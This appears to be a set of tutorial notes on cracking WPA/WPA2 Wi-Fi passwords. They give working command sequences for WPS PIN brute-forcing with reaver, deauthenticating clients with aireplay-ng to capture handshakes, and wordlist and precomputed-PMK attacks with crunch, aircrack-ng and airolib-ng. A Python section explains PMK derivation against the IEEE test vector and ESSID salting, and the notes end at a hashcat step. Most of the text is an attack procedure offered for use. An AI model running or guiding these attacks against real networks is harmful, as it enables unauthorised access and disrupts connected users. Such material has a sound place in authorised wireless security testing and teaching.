#WPA cracking method with WPS enabled
In WPA each packet is encrypted with a unique temporary key, so the number of data packets we collect is irrelevant.
WPA2 and WPA are similar; the only difference is that WPA2 uses an algorithm called CCMP.
WPS Feature
WPS is a feature that allows users to connect to a WPS-enabled network easily, using the WPS button or simply by clicking on the WPS functionality.
Authentication is done using an 8-digit PIN, which means there is a relatively small number of PIN combinations, and using
brute force we can guess the PIN in less than 10 hours.
A tool called reaver can then recover the WPA/WPA2 key from the PIN.
Note: This flaw is in the WPS feature and not in WPA/WPA2; however, it allows us to crack any WPA/WPA2 AP without using a wordlist and without any client.
#cracking WPA/WPA2 with WPS feature
wash -i wlan1
#arguments of wash
Required Arguments:
-i, --interface= Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel= Channel to listen on [auto]
-o, --out-file= Write data to file
-n, --probes= Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-a, --all Show all APs, even those without WPS
-h, --help Show help
#use reaver to crack WPA with WPS enabled
reaver -b [BSSID] -c [channel] -i [interface]
eg:
reaver -b EC:88:XX:XX:XX:XX -c 1 -i wlan1
reaver -i wlan1 -b 78:A1:XX:XX:XX:XX -c 1 -vv
#WPA/WPA2 cracking with WPS disabled
As explained before, capturing WPA data packets is not useful, as they do not contain any info that can be used to crack the key.
The only packets that contain info that helps us crack the password are the handshake packets.
Every time a client connects to the AP, a four-way handshake occurs between the client and the AP.
By capturing the handshake, we can use aircrack-ng to launch a wordlist attack against the handshake to determine its key.
We need two things:
1. Capture the handshake
2. A wordlist
#create a wordlist.
./crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o file
eg:
./crunch 6 8 123456!"&$% -o wordlist -t a@@@@b
crunch 8 8 aswrd0 -o wordlist -t P@@@@@@d
crunch 8 16 -f /path/to/charset.lst
crunch 8 16 -f /usr/share/rainbowcrack/charset.lst mixalpha-numeric -o mywordlist
#kill wpa_supplicant
airmon-ng check kill
#use aircrack-ng to crack the key. It does this by combining each password in the wordlist with the AP name (ESSID)
#to compute a Pairwise Master Key (PMK) using the PBKDF2 algorithm; the PMK is then checked against the handshake file.
aircrack-ng [HANDSHAKE FILE] -w [WORDLIST]
eg:
aircrack-ng is-01.cap -w wordlist
#start airodump-ng on the target AP
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX -w 18102he wlan1
#deauth a client so it reconnects and we capture the handshake
aireplay-ng --deauth 4 -a 14:D6:XX:XX:XX:XX -c 1C:5C:XX:XX:XX:XX wlan1
#crack
aircrack-ng 18102-01.cap -w wordlist
#cracking the key using airolib-ng
1. Create a database and import the wordlist.
airolib-ng [db_name] --import passwd [dictionary]
eg:
airolib-ng is-db --import passwd list
airolib-ng 18102-db --import passwd wordlist
2. Import the target ESSID
airolib-ng is-db --import essid [essid-file]
eg:
airolib-ng is-db --import essid essid-name
echo "18102He" > 18102id
airolib-ng 18102-db --import essid 18102id
3. Compute the PMKs for the wordlist
airolib-ng [db-name] --batch
eg:
airolib-ng is-db --batch
airolib-ng 18102-db --batch
4. Crack the key using the PMK database
aircrack-ng -r [db-name] [handshake_file]
aircrack-ng -r is-db is-01.cap
aircrack-ng -r 18102-db 18102he-01.cap
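The PMK derivation that aircrack-ng and airolib-ng perform (described in the aircrack-ng note above and in steps 1-4 here) is the standard WPA/WPA2-PSK key derivation: PBKDF2-HMAC-SHA1 over the passphrase, salted with the ESSID, 4096 iterations, 256-bit output. The following Python is an added example written for these notes, not code from the page or from the aircrack-ng project. It checks the derivation against the public IEEE 802.11 Annex test vector ("password" / "IEEE") and then shows why a PMK table is bound to one ESSID: the same passphrase under a different network name ("HomeNet", a constructed value) is not found in the table, which is why a non-default SSID and a long passphrase raise the cost of exactly this precomputation.

```python
import hashlib

# Public test vector from the IEEE 802.11 standard (Annex on PSK derivation):
# passphrase "password", SSID "IEEE".
IEEE_TEST_PASSPHRASE = "password"
IEEE_TEST_ESSID = "IEEE"
IEEE_TEST_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

PBKDF2_ITERATIONS = 4096   # fixed by the WPA/WPA2-PSK specification
PMK_LENGTH_BYTES = 32      # 256-bit PMK


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).

    The ESSID is the salt, so the same passphrase yields a different PMK on
    every differently named network.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        essid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH_BYTES,
    )


def build_pmk_table(wordlist, essid: str) -> dict:
    """Precompute PMKs for one ESSID, the same idea as `airolib-ng --batch`.

    Returns a mapping PMK -> passphrase so a later check is a dictionary lookup
    instead of a fresh PBKDF2 run per candidate.
    """
    return {derive_pmk(word, essid): word for word in wordlist}


def lookup_passphrase(table: dict, pmk: bytes):
    """Return the passphrase whose PMK is in the table, or None if absent."""
    return table.get(pmk)


def demo() -> dict:
    """Run the checks and return their results (also usable by tests)."""
    # 1. Sanity-check the derivation against the standard's test vector.
    vector_ok = derive_pmk(IEEE_TEST_PASSPHRASE, IEEE_TEST_ESSID).hex() == IEEE_TEST_PMK_HEX

    # 2. A constructed mini wordlist, precomputed for the ESSID "IEEE".
    constructed_wordlist = ["letmein1", "password", "sunshine9"]
    table = build_pmk_table(constructed_wordlist, IEEE_TEST_ESSID)

    # A network named "IEEE" using "password" is found by table lookup.
    hit = lookup_passphrase(table, derive_pmk("password", "IEEE"))

    # The same passphrase on a network with a different (constructed) name
    # produces a different PMK, so the precomputed table does not apply.
    miss = lookup_passphrase(table, derive_pmk("password", "HomeNet"))

    return {"vector_ok": vector_ok, "hit": hit, "miss": miss, "table_size": len(table)}


if __name__ == "__main__":
    results = demo()
    print("IEEE test vector matches:", results["vector_ok"])
    print("lookup for ESSID 'IEEE':", results["hit"])
    print("lookup for ESSID 'HomeNet' with same table:", results["miss"])
```

The table lookup is what makes airolib-ng fast after the one-time `--batch` step, and the miss on "HomeNet" is the reason step 2 above imports the target ESSID before computing anything: a PMK database is only ever valid for the network names it was built for.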
#speed up the cracking process using a tool called hashcat, which uses the GPU instead of the CPU for the cracking process.
#convert the handshake file format to hccap.